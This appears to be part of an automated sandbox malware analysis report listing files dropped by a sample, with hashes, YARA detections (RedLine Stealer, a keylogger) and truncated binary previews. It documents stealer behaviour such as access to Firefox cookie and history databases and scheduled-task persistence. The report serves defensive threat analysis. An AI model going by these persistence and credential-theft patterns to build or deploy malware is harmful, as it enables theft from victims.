Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpD145.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpD156.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpE088.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\TmpE0A8.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
File Type:	data
Category:	dropped
Size (bytes):	2662
Entropy (8bit):	7.8230547059446645
Encrypted:	false
SSDEEP:	48:qJdHasMPAUha1DgSVVi59ca13MfyKjWwUmq9W2UgniDhiRhkjp9g:bhhEgSVVi59defyfW2sDgAj3g
MD5:	1420D30F964EAC2C85B2CCFE968EEBCE
SHA1:	BDF9A6876578A3E38079C4F8CF5D6C79687AD750
SHA-256:	F3327793E3FD1F3F9A93F58D033ED89CE832443E2695BECA9F2B04ADBA049ED9
SHA-512:	6FCB6CE148E1E246D6805502D4914595957061946751656567A5013D96033DD1769A22A87C45821E7542CDE533450E41182CEE898CD2CCF911C91BC4822371A8
Malicious:	false
Preview:	0..b...0.."...H..............0...0......H..............0...0......H............0...0....H.......0...p.,\|.(.............mW.....$\|Bb.[ .w..#.G.a.K-..i.....+Yo..^m~{........@...iC....[....L.q.J....s?K..G..n.}......;.Q..6..WW..uP.k.F..</..%...X.P...V..R......@.Va...Zm....(M3......"..2-..{9......k.3....Y..c]..O.Bq.H.>..p.RS...\|B.d..kr.=G.g.v..f.d.C.?...0Ch[2:.V....A..7..PD..G....p..*.L{1.&'e..uU)@.i....:.P.;.j.j.......Y.:.a..6.j.L.J.....^[..8,."...2E.......[qU..6.].......nr..i..^l......-..m..u@P;..Ra."......n.p.Z..).:p).F($..\|.R.!9V.....[.gV...i..!.....=.y{.T6.9.m..+.....(2..\..V.1..].V...q.%.4.a...n.B..Q..g.~N..s....=iZ...3..).......E..A.I...hH..Q%0.]...u..........h0T.P.X.A............'.....O....Py.=..3..n..c.F.$z..t..jM.E..W...i1..'...Y,r.,.+...o.}.7..kb.t'DQTV..{...#....sT..G...:..3.L.....c..b%z..e.\.EY...M;x.Z....t..nv...@Ka.....\|s>.2Qr..f,O..XJ`d....78H8.....`..);.vMcUJ.......m.G5.ib]5.h.v<.?S.{1O.Y...kb.....a&.R......E.l..."J..G.

C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000065001\stories.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	708608
Entropy (8bit):	6.51414217122021
Encrypted:	false
SSDEEP:	12288:UQCCh1TaLSSKrPD37zzH2A6QGgx/nstpq9KgER19zrNidbQgUHayxyF:UQPh1eLSSKrPD37zzH2A6QD/srqggEQX
MD5:	C8AFA039FC2A7F032512686FB50692DF
SHA1:	3FCE9102949FA0FAC312574E6D3756F26735C000
SHA-256:	123E40B411BA32E768103090C2EB1C3B874F2C933F7E9F30717185B41F232332
SHA-512:	F185AA5A85570DD2172752D59278FD6B2B61DBA48890DEB48EC2803F3E3E10573CF600EE91F1AF1A77B56F2F44A52B16873BA5E6DF2D85C097C16D8EBAC98666
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%........................................................... ......................................................CODE............................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata....... ......................@..P.reloc..H....0......................@..P.rsrc...............................@..P.....................\..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:	24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.720366600008286
Encrypted:	false
SSDEEP:	96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
MD5:	E4211D6D009757C078A9FAC7FF4F03D4
SHA1:	019CD56BA687D39D12D4B13991C9A42EA6BA03DA
SHA-256:	388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
SHA-512:	17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-FGF43.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-7SII3.tmp\stories.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:	384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\svchost015.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000191001\needmoney.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2990472
Entropy (8bit):	6.459856200541649
Encrypted:	false
SSDEEP:	49152:/INqIwJA7BYAzLOhHpB63X4oQaM35DhnSYf7bPZcYsO5+th1:wNqC7BZEHSQz5DhnSy7ujL
MD5:	B826DD92D78EA2526E465A34324EBEEA
SHA1:	BF8A0093ACFD2EB93C102E1A5745FB080575372E
SHA-256:	7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B
SHA-512:	1AC4B731B9B31CABF3B1C43AEE37206AEE5326C8E786ABE2AB38E031633B778F97F2D6545CF745C3066F3BD47B7AAF2DED2F9955475428100EAF271DD9AEEF17
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....\"f..................#.........l.#.......#...@..........................p1.....?.-...`...(..@...........................p&.l3....(...............-..!....................................&.....................................................CODE......#.......#................. ..`DATA....0.....#.......#.............@...BSS...........$......\$..................idata..l3...p&..4...\$.............@....tls....\|.....&.......$..................rdata........&.......$.............@..P.reloc.......&.......$.............@..P.rsrc.........(.......$.............@..P.............p1......,/.............@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\7d92c2d7bf21ddaa21147122f0cd9393_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\dd393d29d83c2ddd8b9cedf2c349737a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe
File Type:	data
Category:	dropped
Size (bytes):	2251
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0158FE9CEAD91D1B027B795984737614
SHA1:	B41A11F909A7BDF1115088790A5680AC4E23031B
SHA-256:	513257326E783A862909A2A0F0941D6FF899C403E104FBD1DBC10443C41D9F9A
SHA-512:	C48A55CC7A92CEFCEFE5FB2382CCD8EF651FC8E0885E88A256CD2F5D83B824B7D910F755180B29ECCB54D9361D6AF82F9CC741BD7E6752122949B657DA973676
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000342001\rstxdhuj.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	986112
Entropy (8bit):	7.987134427472388
Encrypted:	false
SSDEEP:	24576:6MGVJ/Oap+Bh45LEwaV1QghDHm5GQTSmGg:6NJ/jpi5waVhjm5GQ2m7
MD5:	1EF39C8BC5799AA381FE093A1F2D532A
SHA1:	57EABB02A7C43C9682988227DD470734CC75EDB2
SHA-256:	0CCED5B50789FCA3AD4B2C151B798363D712DA04C377BD704DCEF4898E66B2B4
SHA-512:	13A9C267C4CEB2BD176F1339FAA035FFEB08936DEEEB4E38252EA43CFE487EA1C1876E4CC2A965548E767AF02805A1DA62885E6538DA056BE0C6FAE33B637682
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'1.f.............................!... ...@....@.. ....................................`.................................(!..W....@..`....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................d!......H.......P....G...........U.............................................."..(.......>..(.....oV...&.s..........0..........(.........(....o....3.(....-..j~....%..(....~....o.......j@8...(......s.......o........&..o ...s!.........o".....,...i-....,...o#....($.....o%...o&...o#........(....(......(..........c.o'.......o'........c.o'.......c.o'.......o'........c.o'........c.o'........c.o'....o(......j....+)....o)...nX.....bX.....da.....o*......X......3....bX.....da.....bX....!.

C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	311296
Entropy (8bit):	5.082543579488037
Encrypted:	false
SSDEEP:	3072:Oq6EgY6iYrUj1Np/wPG/2hIUrTA7tMSiy1cZqf7D34teqiOLibBOQ:1qY6i3wPtIUrTAxMY1cZqf7DIXL
MD5:	4E60F3FD76D9EAB244F9DC00F7765B0B
SHA1:	1A154D6E837E7105C551793131CDE89F157C4330
SHA-256:	D6945846CC23C01B9C9AD2B97D35B5A14C01F1A4CC2EC651A596F06777BA4FEC
SHA-512:	44727E25781F448579AC35AAB94AFF550ED9FE5AC58D95BD394569C62892DC78216AC687BAA43CEF66187EBE629F5DD9CD63EA274222D11DBEF3440EC4D7F77A
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, Author: Joe Security
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... ................0................. ... ....@.. ....................... ............@.....................................O.... ..............................h................................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\qKLAD7yUjj.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	364544
Entropy (8bit):	6.656062545289343
Encrypted:	false
SSDEEP:	6144:PJdHU1vR3RO5NSdLcHUPnAGrV1GdauIgmxmbsWeSI9ifLW3:PJS1vRhOfX0PA61Gig0mQY
MD5:	A3EF9920A91B891837705E46BB26DE17
SHA1:	9CFBCD0F46EC86FB57D3D6D74A064F9098ADF117
SHA-256:	171CEF885F6C285E995CE3EC5960C5EA4E4ED049CEC362745058FEE39E4136CC
SHA-512:	C65E91091B95C3ABA0AF7DF4ED6543D26BCB5B54D6FAB82F9D2AC1BA156F475F98124A1A0E8851D69BE23B1DC945C76C075CD32515203273260802E1224DBD6E
Malicious:	true
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....#.f..........................................@..........................P............@.....................................x................................J...................................................................................text...~........................... ..`.rdata...).......*..................@..@.data............b..................@....reloc...J.......L...D..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.453776080602748
Encrypted:	false
SSDEEP:	6:Jw7ltX55ZsUEZ+lX1E5WEetFXqYEp5t/uy0lbqut0:Jw7lZuQ1HfXVvt0
MD5:	3D897888393B58E01F0A381F5C2E11EA
SHA1:	A06F551CA721F4DCBFBA94FC8B537E34539EBB69
SHA-256:	6B714EE18812371E986D09BA15E4AE5E3B6AA29DE3063D61478F0F3A0FE3BE94
SHA-512:	DF3479D8C13F44A7305B2D0EC70A9280DE0D44083F2F7B6E315100CC695AD70925896137D089DD81C0AF39061243E2DA8C4B29BBB6FBB6800D0460F887E8EEC4
Malicious:	false
Preview:	........*.9H...)E..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.5.4.f.d.c.5.f.7.0.\.H.k.b.s.s.e...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.437571363713282
Encrypted:	false
SSDEEP:	6:zgVX45ZsUEZ+lX1lOJUPelkDdtFXqYEp5t/uy0lbkt0:URDQ1lOmeeDNfXVgt0
MD5:	3C865519CD8990EDB647637D7A553989
SHA1:	81F3EE752FDA82C464904C3EEECF48CAFC58F8C4
SHA-256:	20A712A5AAF1C72DEF6007AF7E20AAD83F7D80C7E5F5CB977828F08E65BEC501
SHA-512:	DB8D11AB868BE826691E67B9BF47CEC136538A4B81190329F7C84EC64307CCE353E6B0919FDFAD87C465D9838EAD3427AE6E7E28CA1BD8465BFF82663270472D
Malicious:	false
Preview:	....-.~....A...0..E.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000349001\cccc2.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	2.5600289361122233
Encrypted:	false
SSDEEP:	3:oWEMo6vvRya:oWEpKvD
MD5:	198AA7622D86723F12D39AA38A10C97F
SHA1:	B3FE9A9637FAF01EFCFCB92AB288F7C91CE87F63
SHA-256:	88866B26B5F228DBEF268709E063E29F5BD89C114921148BEAA92FC2EACD2E2D
SHA-512:	8452029C020F524303144260D478F8F15E2AD5A4BB3F65DB06B62DEA568FAD165949A0FFDE119D7F5C4CA58E87AF660C35CCD54CE78D82BDEB01F6E84E3ED5BA
Malicious:	false
Preview:	012340..1..2..3..4.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9495630479940464
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'973'760 bytes
MD5:	49a9681922ad571a4a24b42465e5cdc4
SHA1:	f710153121bcde5e6acd4760001d916675973475
SHA256:	c66b9636df8b16d69170b47f28611d70194925cd941c0a7ed49a6f35a599dad6
